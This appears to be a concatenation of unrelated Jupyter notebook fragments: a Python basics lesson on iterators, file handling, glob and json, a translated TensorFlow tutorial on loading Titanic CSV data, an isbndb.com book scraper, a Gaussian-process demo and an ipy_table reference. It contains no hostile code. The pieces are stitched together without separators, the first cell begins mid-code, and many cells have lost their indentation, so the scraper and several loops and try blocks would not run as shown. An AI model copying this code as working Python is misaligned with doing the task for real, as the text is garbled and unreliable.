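# Time a list comprehension against an equivalent append-based loop.
comp_time = timeit.timeit("[v * 2 for v in values]", setup=setup, number=100)
loop_stmt = "\n".join([
    "result = []",
    "for v in values:",
    "    result.append(v * 2)",
])
loop_time = timeit.timeit(loop_stmt, setup=setup, number=100)

print(f"comprehension: {comp_time:.4f}s, loop: {loop_time:.4f}s")
```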
### Iterators
#### Iterators are a memory-efficient way to step through a sequence, letting you achieve more while consuming less memory. Iterators are great when doing analysis on CSVs where we want to operate on the data by hand (without libraries, which generally isn't the case and isn't a good idea).
#### Data engineering tasks that use lists as data structures (which we'll look at in the next session) are a good use case for `iterators` and `generators`
### To convert a list to an iterator, use the built-in `iter()`
```
my_list = range(100, 999)
iterator = iter(my_list)
```
### To access a value in an iterator, use `next()`
```
next(iterator)
```
### If you keep calling `next(iterator)`, it will keep returning values until the iterator is exhausted.
```python
next(iterator)
---------------------------------------------------------------------------
StopIteration Traceback (most recent call last)
<ipython-input-384-3733e97f93d6> in <module>()
----> 1 next(iterator)
StopIteration:
```
### You'll encounter the error above when the iterator is exhausted (in simple terms, there are no values left to iterate through)
## Shaving time off all our operations is essential for us
```
%timeit -n 10000 [num ** 0.3 for num in my_list]
%timeit -n 10000 [iter_ ** 0.3 for iter_ in iterator]
```
### The iterator appears much faster here, but beware: it was exhausted by the first `timeit` pass, so later passes iterate over nothing. Re-create an iterator before re-benchmarking it.
### When an `iterator` exhausts it throws `StopIteration` error, would you be able to catch it?
```
my_list = range(100, 999)
iterator = iter(my_list)
%timeit -n 100 [iter_ ** 0.3 for iter_ in iterator]
try:
next(iterator)
except StopIteration:
print("The iterator has exhausted")
finally:
iterator = iter(my_list)
print("The iterator has been reconfigured")
next(iterator)
```
## `with` keyword
### The `with` statement invokes a context manager; it spares us the manual `try`/`finally` dance needed to reliably open and close a file
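To make the comparison concrete, here is a minimal sketch (the filename `example.txt` is made up for illustration):

```python
# Without `with`: the file must be closed manually, even if an error occurs.
f = open("example.txt", "w")
try:
    f.write("hello")
finally:
    f.close()

# With `with`: the context manager closes the file automatically on exit.
with open("example.txt") as f:
    content = f.read()

print(content)
print(f.closed)  # True: the file was closed when the block ended
```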
#### NOTE: `!ls` will only work for Unix systems, not for Windows. For windows: `!dir` might work
```
!ls
```
### Download some data quickly
```
!wget https://raw.githubusercontent.com/hadley/r4ds/master/data/heights.csv
!ls
```
### Reading the csv file and printing the methods available for the `file` object:
```
with open('heights.csv', 'r') as file:
print(dir(file))
```
### It so happens that the function: `readline()` and `readlines()` help you to access the data in `heights.csv`
```
with open('heights.csv', 'r') as file:
print(file.readline())
```
`readline()` will print out just a single line; to print out all the lines you need to use `readlines()`
```
with open('heights.csv', 'r') as file:
print(file.readlines()[:5])
```
### Note: Since `file.readlines()` returns a list, we slice it to print only the first five rows
## A few useful libraries
### `glob` library: To get paths of all the common file extensions in a folder (e.g `.csv`, `.png`, `.txt`, `.jpeg`)
#### First we'll download a few files
```
!wget https://raw.githubusercontent.com/tidyverse/ggplot2/master/data-raw/economics.csv
!wget https://raw.githubusercontent.com/tidyverse/ggplot2/master/data-raw/midwest.csv
!wget https://raw.githubusercontent.com/tidyverse/ggplot2/master/data-raw/mpg.csv
!ls
import glob # Use `import <library-name>` to import any useful library
glob.glob('./*.csv')
```
#### What the above function `glob.glob('./*.csv')` does is to get all the csv files present in that folder.
#### As we'll find out in the next sessions, this is particularly good when you want to append multiple CSV files (maybe from different months or years or different sources) in a single script. Getting the paths and iterating through that easily can be done using `glob`
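A minimal sketch of that append-multiple-CSVs pattern; the files here are created on the fly purely for illustration:

```python
import csv
import glob
import os
import tempfile

# Create a few small CSV files to iterate over (illustrative data only).
tmpdir = tempfile.mkdtemp()
for month in ("jan", "feb"):
    with open(os.path.join(tmpdir, f"{month}.csv"), "w", newline="") as f:
        writer = csv.writer(f)
        writer.writerow(["month", "value"])
        writer.writerow([month, 1])

# Collect the paths of every CSV in the folder and append their rows.
rows = []
for path in sorted(glob.glob(os.path.join(tmpdir, "*.csv"))):
    with open(path, newline="") as f:
        reader = csv.reader(f)
        next(reader)  # skip the header row
        rows.extend(reader)

print(rows)  # rows from feb.csv come first because of sorted()
```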
### `json` library: Many data sources that an ML engineer might need could be in `*.json` format
#### Downloading a `.json` data file
```
!wget https://api.github.com/emojis
!ls
import json
with open('emojis', 'rb') as file:
print(file.read())
```
#### `file.read()` will give you a raw string format which isn't of great use to us!
```
with open('emojis', 'rb') as file:
print(json.loads(file.read()))
```
#### `json.loads(file.read())` will provide the `dict` format (dictionary data structure) that we can use to get things that we might want to get
```
with open('emojis') as file:
print(json.load(file))
```
#### `json.load(file)` has only a minor difference that it directly loads the file without having to explicitly read it as in `json.loads(file.read())`
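A small self-contained sketch of the difference (the payload here is made up):

```python
import json

payload = {"smile": "https://example.com/smile.png"}

# json.dumps / json.loads operate on strings in memory...
text = json.dumps(payload)
assert json.loads(text) == payload

# ...while json.dump / json.load operate on file objects directly.
with open("payload.json", "w") as f:
    json.dump(payload, f)
with open("payload.json") as f:
    loaded = json.load(f)  # no explicit f.read() needed

print(loaded)
```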
##### Copyright 2019 The TensorFlow Authors.
```
#@title Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
```
# Loading CSV data with tf.data
<table class="tfo-notebook-buttons" align="left">
<td>
<a target="_blank" href="https://www.tensorflow.org/beta/tutorials/load_data/csv"><img src="https://www.tensorflow.org/images/tf_logo_32px.png" />View on TensorFlow.org</a>
</td>
<td>
<a target="_blank" href="https://colab.research.google.com/github/tensorflow/docs/blob/master/site/ja/beta/tutorials/load_data/csv.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />Run in Google Colab</a>
</td>
<td>
<a target="_blank" href="https://github.com/tensorflow/docs/blob/master/site/ja/beta/tutorials/load_data/csv.ipynb"><img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />View source on GitHub</a>
</td>
</table>
Note: These documents are translations produced by the TensorFlow community. Community translations are **best-effort**, so there is no guarantee that this translation is accurate or reflects the latest state of the [official English documentation](https://www.tensorflow.org/?hl=en). If you have suggestions to improve this translation, please send a pull request to the GitHub repository [tensorflow/docs](https://github.com/tensorflow/docs). To volunteer to help with community translations or reviews, please contact the [docs-ja@tensorflow.org mailing list](https://groups.google.com/a/tensorflow.org/forum/#!forum/docs-ja).
This tutorial shows an example of loading CSV data into a `tf.data.Dataset`.
The data used in this tutorial comes from the Titanic passenger list. We will try to predict a passenger's likelihood of survival from characteristics such as age, sex, ticket class, and whether the passenger is traveling alone.
## Setup
```
try:
!pip install tf-nightly-2.0-preview
except Exception:
pass
from __future__ import absolute_import, division, print_function, unicode_literals
import numpy as np
import tensorflow as tf
import tensorflow_datasets as tfds
TRAIN_DATA_URL = "https://storage.googleapis.com/tf-datasets/titanic/train.csv"
TEST_DATA_URL = "https://storage.googleapis.com/tf-datasets/titanic/eval.csv"
train_file_path = tf.keras.utils.get_file("train.csv", TRAIN_DATA_URL)
test_file_path = tf.keras.utils.get_file("eval.csv", TEST_DATA_URL)
# make numpy values easier to read
np.set_printoptions(precision=3, suppress=True)
```
## Loading the data
As always, let's start by looking at the top of the CSV file we are working with.
```
!head {train_file_path}
```
As you can see, the columns in the CSV are labeled. We will need them later, so let's read them from the file.
```
# CSV columns in the input file
with open(train_file_path, 'r') as f:
names_row = f.readline()
CSV_COLUMNS = names_row.rstrip('\n').split(',')
print(CSV_COLUMNS)
```
The dataset constructor picks up these labels automatically.
If the first line of your file does not contain the column names, pass them as a list of strings via the `column_names` argument of the `make_csv_dataset` function.
```python
CSV_COLUMNS = ['survived', 'sex', 'age', 'n_siblings_spouses', 'parch', 'fare', 'class', 'deck', 'embark_town', 'alone']
dataset = tf.data.experimental.make_csv_dataset(
...,
column_names=CSV_COLUMNS,
...)
```
This example uses all the available columns. If you need to omit columns from the dataset, make a list of just the columns you want to use and pass it to the (optional) `select_columns` argument of the constructor.
```python
drop_columns = ['fare', 'embark_town']
columns_to_use = [col for col in CSV_COLUMNS if col not in drop_columns]
dataset = tf.data.experimental.make_csv_dataset(
...,
select_columns = columns_to_use,
...)
```
You also need to identify which column serves as the label for each example, and indicate what it is.
```
LABELS = [0, 1]
LABEL_COLUMN = 'survived'
FEATURE_COLUMNS = [column for column in CSV_COLUMNS if column != LABEL_COLUMN]
```
Now that the constructor arguments are in place, let's read the CSV data from the file and create a dataset.
(For the full documentation, see `tf.data.experimental.make_csv_dataset`.)
```
def get_dataset(file_path):
dataset = tf.data.experimental.make_csv_dataset(
file_path,
batch_size=12, # intentionally set small so the output is easy to read
label_name=LABEL_COLUMN,
na_value="?",
num_epochs=1,
ignore_errors=True)
return dataset
raw_train_data = get_dataset(train_file_path)
raw_test_data = get_dataset(test_file_path)
```
Each element of the dataset is a batch, represented as a tuple of (many examples, many labels). The data in the examples is organized as column-based tensors (rather than row-based tensors), each containing batch-size (12 in this case) elements.
Let's take a look.
```
examples, labels = next(iter(raw_train_data)) # first batch only
print("EXAMPLES: \n", examples, "\n")
print("LABELS: \n", labels)
```
## Data preprocessing
### Categorical data
Some of the columns in this CSV data are categorical columns, meaning their contents must be one of a limited set of options.
In this CSV those options are represented as text. The text needs to be converted to numbers so the model can be trained. To make this easier, we create a list of the categorical columns along with a list of the options for each.
```
CATEGORIES = {
'sex': ['male', 'female'],
'class' : ['First', 'Second', 'Third'],
'deck' : ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J'],
'embark_town' : ['Cherbourg', 'Southhampton', 'Queenstown'],
'alone' : ['y', 'n']
}
```
Write a function that takes a tensor of categorical values, matches it against the list of value names, and then one-hot encodes it.
```
def process_categorical_data(data, categories):
    """Returns a one-hot encoded tensor representing the categorical values"""
    # Remove the leading ' '
    data = tf.strings.regex_replace(data, '^ ', '')
    # Remove the trailing '.'
    data = tf.strings.regex_replace(data, r'\.$', '')
    # One-hot encoding
    # Reshape data from 1-D (a list) to 2-D (a list of single-element lists)
    data = tf.reshape(data, [-1, 1])
    # For each element, build a boolean list with one entry per category,
    # True where the element matches the category label
    data = categories == data
    # Cast the booleans to floats
    data = tf.cast(data, tf.float32)
    # The entire encoding can also be collapsed into a single line:
    # data = tf.cast(categories == tf.reshape(data, [-1, 1]), tf.float32)
    return data
```
To visualize this process, take one categorical-column tensor from the first batch, process it, and show the state before and after.
```
class_tensor = examples['class']
class_tensor
class_categories = CATEGORIES['class']
class_categories
processed_class = process_categorical_data(class_tensor, class_categories)
processed_class
```
Notice the relationship between the lengths of the two inputs and the shape of the output.
```
print("Size of batch: ", len(class_tensor.numpy()))
print("Number of category labels: ", len(class_categories))
print("Shape of one-hot encoded tensor: ", processed_class.shape)
```
### Continuous data
Continuous data needs to be standardized so that the values fall between 0 and 1. To do this, write a function that multiplies each value by 1 over twice the mean of the column values.
The function should also reshape the data into a 2-D tensor.
```
def process_continuous_data(data, mean):
    # Standardize the data
    data = tf.cast(data, tf.float32) * 1/(2*mean)
    return tf.reshape(data, [-1, 1])
```
This calculation requires the means of the column values. In practice you would of course compute them, but for this example we simply provide the values.
```
MEANS = {
'age' : 29.631308,
'n_siblings_spouses' : 0.545455,
'parch' : 0.379585,
'fare' : 34.385399
}
```
As before, to see what this function actually does, take one tensor of continuous values and look at it before and after processing.
```
age_tensor = examples['age']
age_tensor
process_continuous_data(age_tensor, MEANS['age'])
```
### Preprocessing the data
Combine these preprocessing tasks into a single function that can be mapped over each batch in the dataset.
```
def preprocess(features, labels):
    # Process the categorical features
    for feature in CATEGORIES.keys():
        features[feature] = process_categorical_data(features[feature],
                                                     CATEGORIES[feature])
    # Process the continuous features
    for feature in MEANS.keys():
        features[feature] = process_continuous_data(features[feature],
                                                    MEANS[feature])
    # Assemble the features into a single tensor
    features = tf.concat([features[column] for column in FEATURE_COLUMNS], 1)
    return features, labels
```
Next, apply it with the `tf.Dataset.map` function, and shuffle the dataset to avoid overfitting.
```
train_data = raw_train_data.map(preprocess).shuffle(500)
test_data = raw_test_data.map(preprocess)
```
Let's see what a single example looks like.
```
examples, labels = next(iter(train_data))
examples, labels
```
Each example is a 2-D array with 12 items (the batch size). Each item represents one row of the original CSV file. The labels are a 1-D tensor with 12 values.
## Building the model
This example uses the [Keras Functional API](https://www.tensorflow.org/alpha/guide/keras/functional), wrapped in a `get_model` constructor, to build a simple model.
```
def get_model(input_dim, hidden_units=[100]):
    """Create a Keras model with multiple layers.

    Args:
      input_dim: (int) shape of an item in a batch
      labels_dim: (int) shape of the labels
      hidden_units: [int] layer sizes of the DNN (input layer first)
      learning_rate: (float) optimizer learning rate

    Returns:
      A Keras model
    """
    inputs = tf.keras.Input(shape=(input_dim,))
    x = inputs
    for units in hidden_units:
        x = tf.keras.layers.Dense(units, activation='relu')(x)
    outputs = tf.keras.layers.Dense(1, activation='sigmoid')(x)
    model = tf.keras.Model(inputs, outputs)
    return model
```
The `get_model` constructor needs to know the shape of the input data (excluding the batch size).
```
input_shape, output_shape = train_data.output_shapes
input_dimension = input_shape.dims[1] # [0] is the batch size
```
## Train, evaluate, and predict
The model can now be instantiated and trained.
```
model = get_model(input_dimension)
model.compile(
loss='binary_crossentropy',
optimizer='adam',
metrics=['accuracy'])
model.fit(train_data, epochs=20)
```
Once the model is trained, you can check its accuracy on the `test_data` dataset.
```
test_loss, test_accuracy = model.evaluate(test_data)
print('\n\nTest Loss {}, Test Accuracy {}'.format(test_loss, test_accuracy))
```
To infer labels for a single batch, or for a dataset of batches, use `tf.keras.Model.predict`.
```
predictions = model.predict(test_data)
# show some of the results
for prediction, survived in zip(predictions[:10], list(test_data)[0][1][:10]):
print("Predicted survival: {:.2%}".format(prediction[0]),
" | Actual outcome: ",
("SURVIVED" if bool(survived) else "DIED"))
```
```
import pandas as pd
from bs4 import BeautifulSoup as bs
import bs4
import requests
from pprint import pprint
import Memory_Collaborative_Filtering as mem
import sqlite3 as sql
def url_builder_1(book_title):
path = 'https://isbndb.com/search/books/'
title_list = book_title.split()
final_path_list=[]
for x in range(len(title_list)):
if x==len(title_list)-1:
final_path_list.append(title_list[x])
else:
final_path_list.append(title_list[x]+'%20')
return path+''.join(final_path_list)
def url_builder_2(isbn13):
path = "https://isbndb.com/book/"
return path+isbn13
def retrieve_page_content(url):
page = requests.get(url)
return page.content
def tag_visible(element):
if element.parent.name in ['style', 'script', 'head', 'title', 'meta', '[document]']:
return False
if isinstance(element, bs4.element.Comment):
return False
return True
def text_from_html(body):
soup = bs(body, 'html.parser')
texts = soup.findAll(text=True)
visible_texts = filter(tag_visible, texts)
return u" ".join(t.strip() for t in visible_texts)
def retrieve_author(book_title, product_id, html_text, index):
author='Cannot Locate'
html_text_list = html_text.split()
for x in range(len(html_text_list)):
if html_text_list[x]=='Authors:':
author=html_text_list[x+1]+' '+html_text_list[x+2]
break
author_dict = {'book_title': book_title, 'product_id': product_id, 'author': author}
author_table = pd.DataFrame(author_dict, index=[index])
return author_table
def retrieve_isbn13(book_title, product_id, html_text, index):
isbn13 = 'Cannot Locate'
html_text_list = html_text.split()
for x in range(len(html_text_list)):
if html_text_list[x]=='ISBN13:':
isbn13= html_text_list[x+1]
break
isbn13_dict = {'book_title': book_title, 'product_id':product_id, 'ISBN13':isbn13}
isbn13_table = pd.DataFrame(isbn13_dict, index=[index])
return isbn13_table
def main_author(data):
final_authors=pd.DataFrame()
counter=0
for x in range(len(data)):
try:
counter+=1
url=url_builder_1(data['product_title'][x])
html=retrieve_page_content(url)
text_html=text_from_html(html)
author = retrieve_author(data['product_title'][x], data['product_id'][x], text_html, counter)
final_authors = final_authors.append(author)
print(counter)
except:
pass
return final_authors
def retrieve_book_category(book_title, product_id, html_text, index):
book_categories = 'Cannot Locate'  # default matches the name used below, avoiding a NameError when 'Subjects' is absent
html_text_list = html_text.split()
for x in range(len(html_text_list)):
if html_text_list[x]=='Subjects':
book_categories = html_text_list[x+1]+', '+html_text_list[x+2]+', '+html_text_list[x+3]
break
book_categories_dict = {'book_title': book_title, 'product_id':product_id, 'book_category':book_categories}
book_categories_table = pd.DataFrame(book_categories_dict, index=[index])
return book_categories_table
def main_categories(data):
counter=0
book_categories=pd.DataFrame()
for x in range(len(data)):
try:
counter+=1
url=url_builder_1(data['product_title'][x])
html=retrieve_page_content(url)
text_html=text_from_html(html)
isbn13 = retrieve_isbn13(data['product_title'][x], data['product_id'][x], text_html, counter)
url2=url_builder_2(isbn13.iloc[0]['ISBN13'])
html2=retrieve_page_content(url2)
text_html2=text_from_html(html2)
category=retrieve_book_category(data['product_title'][x], data['product_id'][x], text_html2, counter)
book_categories = book_categories.append(category)
print(counter)
except:
pass
return book_categories
```
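As an aside, the word-joining loop in `url_builder_1` is behaviourally equivalent to a single `'%20'.join(...)`; a quick sanity check (the title is arbitrary):

```python
def url_builder_1(book_title):
    # original loop-based version, reproduced for comparison
    path = 'https://isbndb.com/search/books/'
    title_list = book_title.split()
    final_path_list = []
    for x in range(len(title_list)):
        if x == len(title_list) - 1:
            final_path_list.append(title_list[x])
        else:
            final_path_list.append(title_list[x] + '%20')
    return path + ''.join(final_path_list)

def url_builder_1_short(book_title):
    # equivalent one-liner
    return 'https://isbndb.com/search/books/' + '%20'.join(book_title.split())

title = "war and peace"
assert url_builder_1(title) == url_builder_1_short(title)
print(url_builder_1_short(title))
```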
```
import numpy as np
import matplotlib.pyplot as plt
%load_ext autoreload
%autoreload 2
%matplotlib inline
%config InlineBackend.figure_format = 'retina'
```
# A Fundamental Property of Gaussians
A multivariate Gaussian is nothing more than a generalization of the univariate Gaussian.
We parameterize univariate Gaussians with a $\mu$ and $\sigma$, where $\mu$ and $\sigma$ are scalars.
A bivariate Gaussian is two univariate Gaussians that may also share a relationship to one another. We can jointly model both Gaussians by modelling not just how they vary independently, but also how they vary with one another.
```
mu1 = np.array(0)
mu2 = np.array(0)
sig11 = np.array(3)
sig12 = np.array(-2)
sig21 = np.array(-2)
sig22 = np.array(4)
mean = np.array([mu1, mu2])
cov = np.array([[sig11, sig12], [sig21, sig22]])
draws = np.random.multivariate_normal(mean, cov, size=1000)
plt.scatter(*draws.T)
```
One of the fundamental properties of Gaussians is that if you have a Multivariate Gaussian (e.g. a joint distribution of 2 or more Gaussian random variables), if we condition on any subset of Gaussians, the joint distribution of the rest of the Gaussians can be found analytically. There's a formula, and it's expressed in code below.
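For reference, the standard conditioning identities computed in the code below are:

$$\mu_{2|1} = \mu_2 + \Sigma_{21}\Sigma_{11}^{-1}(x_1 - \mu_1), \qquad \Sigma_{2|1} = \Sigma_{22} - \Sigma_{21}\Sigma_{11}^{-1}\Sigma_{12}$$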
```
x1 = 0
mu_2g1 = mu2 + sig21 * 1 / sig11 * (x1 - mu1)
sig_2g1 = sig22 - sig21 * 1 / sig11 * sig12
mu_2g1, sig_2g1
```
Go ahead and play with the slider below.
```
from ipywidgets import interact, FloatSlider, IntSlider
@interact(x1=FloatSlider(min=-4, max=4, continuous_update=False))
def plot_conditional(x1):
fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(12, 6))
axes[0].scatter(*draws.T)
axes[0].vlines(x=x1, ymin=draws[:, 1].min(), ymax=draws[:, 1].max(), color='red')
axes[0].hlines(y=0, xmin=draws[:, 0].min(), xmax=draws[:, 0].max(), color='black')
# Compute Conditional
mu_2g1 = mu2 + sig21 * 1 / sig11 * (x1 - mu1)
sig_2g1 = sig22 - sig21 * 1 / sig11 * sig12
x2_draws = np.random.normal(mu_2g1, sig_2g1, size=10000)
axes[1].hist(x2_draws, bins=100, color='red')
axes[1].vlines(x=0, ymin=0, ymax=400, color='black')
axes[1].set_xlim(-10, 10)
axes[1].set_ylim(0, 400)
```
# 2D $\mu$s
Let's take this into higher dimensions: instead of two scalar $\mu$s, consider two $\mu$s that are each 2-dimensional vectors.
```
mu1 = np.array([0, 0])
mu2 = np.array([0, 0])
sig11 = np.array([[1, 0], [0, 1]])
sig12 = np.array([[2, 0], [0, 2]])
sig21 = sig12.T
sig22 = np.array([[0.8, 0], [0, 0.8]])
mean = np.array([mu1, mu2])
cov = np.array([[sig11, sig12], [sig21, sig22]])
# draws = np.random.multivariate_normal(mean, cov, size=1000)
# plt.scatter(*draws.T)
cov
x1 = np.array([0, -3])
mu_2g1 = mu2 + sig21 @ np.linalg.inv(sig11) @ (x1 - mu1)
sig_2g1 = sig22 - sig21 @ np.linalg.inv(sig11) @ sig12
sig_2g1, mu_2g1
```
# Implementing GP Prior
When we use a GP, we're essentially modelling the **outputs** as being described by a joint Gaussian distribution.
We would like to be able to specify the covariance matrix as a function of the distances between the inputs - regardless of whether the inputs are 1-D, 2-D, or more. That is the key to generalizing from 1D examples to the 2D examples commonly shown.
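Concretely, the covariance below comes from the squared-exponential (RBF) kernel with unit variance and unit length scale, which depends on the inputs only through their separation:

```latex
k(x, x') = \exp\left(-\tfrac{1}{2}\,\lVert x - x' \rVert^2\right)
```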
```
import seaborn as sns
n = 50
x_train = np.linspace(-5, 5, n).reshape(-1, 1)
# sns.heatmap(x_train - x_train.T, cmap='RdBu')
def sq_exp(x1, x2):
"""
Squared exponential kernel.
Assumes that x1 and x2 have the same shape.
"""
diff = x1 - x2.T
sqdiff = np.power(diff, 2)
return np.exp(-0.5 * sqdiff)
sns.heatmap(sq_exp(x_train, x_train), cmap='RdBu')
```
Draw from prior.
```
K = sq_exp(x_train, x_train)
eps = 1E-6 * np.eye(n)  # jitter to keep the Cholesky factorization numerically stable
L = np.linalg.cholesky(K + eps)
f_prior = np.dot(L, np.random.normal(size=(n, 10)))
plt.plot(x_train, f_prior)
plt.show()
def true_function_1d(x):
x = x + 1E-10
return np.sin(x)
n = 200
x_samp = np.array([2, 18, -10, 10, -12, 12, -2, 5, -13, 6, -18, 8, -8, 0, 15]).reshape(-1, 1)
f_samp = true_function_1d(x_samp)
K_samp = sq_exp(x_samp, x_samp)
eps = 1E-6 * np.eye(len(x_samp))
L_samp = np.linalg.cholesky(K_samp + eps)
x_s = np.linspace(-20, 20, n).reshape(-1, 1)
K_ss = sq_exp(x_s, x_s)
K_s = sq_exp(x_samp, x_s)
mu_cond = K_s.T @ np.linalg.inv(K_samp) @ f_samp
sig_cond = K_ss - K_s.T @ np.linalg.inv(K_samp) @ K_s
f_posterior = np.random.multivariate_normal(mu_cond.flatten(), sig_cond, size=100)
for f in f_posterior:
plt.plot(x_s, f, color='grey', alpha=0.1)
plt.scatter(x_samp, f_samp)
plt.plot(x_s, true_function_1d(x_s))
plt.plot(x_s, mu_cond.flatten())
plt.show()
sig_cond.min()
sns.heatmap(sig_cond, cmap='RdBu')
```
We can extend this code to two dimensions. Let's say that our data lives on a grid, rather than on a single dimension, with a periodic function evaluated over the 2D grid.
```
def true_function(x1, x2):
# return np.sin(x1**2 + x2**2) / (x1**2 + x2**2)
return np.sin(x1) + np.sin(x2)
```
# Prior
Let's sample a prior from a 2D plane.
```
sq_exp??
import numpy as np
import scipy
x1 = np.array([[2, 2], [2, 1], [1, 2], [1, 1]])
def sq_exp2d(x1, x2):
d = scipy.spatial.distance.cdist(x1, x2)
return np.exp(-0.5 * np.power(d, 2))
x1 = np.linspace(-5, 5, 20)
x2 = np.linspace(-5, 5, 20)
xx1, xx2 = np.meshgrid(x1, x2, sparse=True)
z = true_function(xx1, xx2)
h = plt.contourf(x1, x2, z)
plt.gca().set_aspect('equal')
plt.title('true function')
true_function(xx1, xx2).shape
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
z = true_function(xx1, xx2)
ax.plot_surface(xx1, xx2, z)
ax.set_title('true function')
plt.show()
```
We'll simulate sampling 7 starting points.
```
x_samp = np.array([[0, 3], [1, 2], [1, -5], [-2, -2], [-2, 2], [2, -2], [3, 5]])
f_samp = true_function(x_samp[:, 0], x_samp[:, 1])
K_samp = sq_exp2d(x_samp, x_samp)
eps = 1E-6 * np.eye(len(x_samp))
L_samp = np.linalg.cholesky(K_samp + eps)
n = 35
x_points = np.linspace(-5, 5, n).reshape(-1, 1)
xx1, xx2 = np.meshgrid(x_points, x_points, sparse=False)
x_spts = np.vstack([xx1.flatten(), xx2.flatten()])
K_ss = sq_exp2d(x_spts.T, x_spts.T)
K_s = sq_exp2d(x_samp, x_spts.T)
mu_cond = K_s.T @ np.linalg.inv(K_samp) @ f_samp.flatten()
sig_cond = K_ss - K_s.T @ np.linalg.inv(K_samp) @ K_s
n_samps = 1000
f_posterior = np.random.multivariate_normal(mu_cond, sig_cond, size=n_samps)
# for f in f_posterior:
# plt.plot(x_s, f, color='grey', alpha=0.1)
# plt.scatter(x_samp, f_samp)
# plt.plot(x_s, true_function(x_train))
# plt.plot(x_s, mu_cond.flatten())
f_posterior.reshape(n_samps, n, n).max(axis=0)
mu_cond.shape
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.plot_surface(xx1, xx2, mu_cond.reshape(n, n))
ax.set_title('mean')
plt.show()
lower, upper = np.percentile(f_posterior.reshape(n_samps, n, n), [2.5, 97.5], axis=0)
uncertainty = upper - lower
uncertainty.shape
fig, axes = plt.subplots(nrows=1, ncols=3, figsize=(15, 5), sharex=True, sharey=True)
axes[0].contourf(xx1, xx2, uncertainty, levels=50)
axes[0].set_title('95% interval size')
axes[0].scatter(*x_samp.T, color='red')
axes[0].set_aspect('equal')
axes[0].set_ylim(-5, 5)
axes[0].set_xlim(-5, 5)
axes[1].contourf(xx1, xx2, true_function(xx1, xx2), levels=50)
axes[1].set_title('ground truth')
axes[1].scatter(*x_samp.T, color='red')
axes[1].set_aspect('equal')
axes[2].contourf(xx1, xx2, mu_cond.reshape(n, n), levels=50)
axes[2].set_title('mean')
axes[2].scatter(*x_samp.T, color='red')
axes[2].set_aspect('equal')
```
In the plots above, red dots mark where we have sampled points on the 2D grid.
The left plot shows the size of the 95% prediction interval at each point on the grid. We can see that the uncertainty is smallest where we have sampled.
The middle plot shows the ground truth, along with the locations where we sampled data.
The right plot shows the posterior mean. It is evident that away from the sampled points, the function evaluations revert to the prior mean.
# Parting Thoughts
The key ingredient of a GP is a kernel that can model "distance" of some kind between every pair of inputs. Thus, it isn't the number of input dimensions that is limiting; it is the number of *data points that have been sampled*! (Inverting the kernel matrix depends only on the data we are conditioning on, and costs $O(n^3)$.)
```
x2_new, x1_new = np.where(uncertainty == uncertainty.max()) # row, then column, i.e. x2 then x1.
xx1_s, xx2_s = np.meshgrid(x_points, x_points, sparse=True)
xx1_s.flatten()[x1_new], xx2_s.flatten()[x2_new]
```
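A side note on that $O(n^3)$ cost: the `np.linalg.inv(K_samp)` calls used earlier can be replaced with a Cholesky-based solve, which is cheaper and numerically more stable. This is a sketch, not part of the original notebook; the argument names mirror the `K_samp`, `K_s`, `K_ss`, `f_samp` variables used above.

```python
import numpy as np

def gp_conditional(K_samp, K_s, K_ss, f_samp, jitter=1e-6):
    """Posterior mean/covariance via a Cholesky solve instead of an explicit inverse."""
    n = K_samp.shape[0]
    L = np.linalg.cholesky(K_samp + jitter * np.eye(n))
    # Solve K_samp @ alpha = f_samp with two triangular solves.
    alpha = np.linalg.solve(L.T, np.linalg.solve(L, f_samp))
    mu_cond = K_s.T @ alpha
    # v = L^{-1} K_s, so K_s.T @ K_samp^{-1} @ K_s == v.T @ v
    v = np.linalg.solve(L, K_s)
    sig_cond = K_ss - v.T @ v
    return mu_cond, sig_cond
```

With the same small jitter, this matches the inverse-based computation to numerical precision while doing less work per solve.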
# ipy_table Reference
The home page for ipy_table is at [epmoyer.github.com/ipy_table/](http://epmoyer.github.com/ipy_table/)
ipy_table is maintained at [github.com/epmoyer/ipy_table](https://github.com/epmoyer/ipy_table)
```
import add_parent_to_path
```
## Table Creation
To create a table, call ``make_table()`` on an array (a list of equal-sized lists) or a ``numpy.ndarray``.
``make_table()`` creates a table in interactive mode. Subsequent calls to modify styles (e.g. ``apply_theme()``, ``set_cell_style()``, etc.) will re-render the table with the new style modifications.
```
from ipy_table import *
example_table = [[i for i in range(j,j+4)] for j in range(0,30,10)]
make_table(example_table)
```
## Built-in Styles
ipy_table implements three pre-defined table styles (basic, basic_left, and basic_both) which provide bold gray headers and alternating colored rows for three different header configurations.
```
make_table(example_table)
apply_theme('basic')
make_table(example_table)
apply_theme('basic_left')
import copy
example_table2 = copy.deepcopy(example_table) # Copy the example table
example_table2[0][0] = '' # Clear the contents of the upper left corner cell
make_table(example_table2)
apply_theme('basic_both')
```
## set_cell_style()
Sets the style of a single cell. For a list of the available style options, see **Style Options** below.
```
make_table(example_table)
set_cell_style(1, 2, color='red')
```
## set_row_style()
Sets the style for a row of cells. For a list of the available style options, see **Style Options** below.
```
make_table(example_table)
set_row_style(0, color='lightGreen')
```
## set_column_style()
Sets the style for a column of cells. For a list of the available style options, see **Style Options** below.
```
make_table(example_table)
set_column_style(1, color='lightBlue')
```
## set_global_style()
Sets the style for all cells. For a list of the available style options, see **Style Options** below.
```
make_table(example_table)
set_global_style(color='Pink')
```
## Style options
### bold
```
make_table(example_table)
set_row_style(1, bold=True)
```
### italic
```
make_table(example_table)
set_row_style(1, italic=True)
```
### color
Sets the background cell color by name. The color name can be any standard web/X11 color name. For a list see http://en.wikipedia.org/wiki/Web_colors
```
make_table(example_table)
set_row_style(1, color='Orange')
```
### thick_border
Accepts a comma-delimited list of cell edges, which may be any of: left, top, right, bottom. You can also specify 'all' to include all edges.
```
make_table(example_table)
set_cell_style(0,0, thick_border='left,top')
set_cell_style(2,3, thick_border='right,bottom')
make_table(example_table)
set_row_style(1, thick_border='all')
```
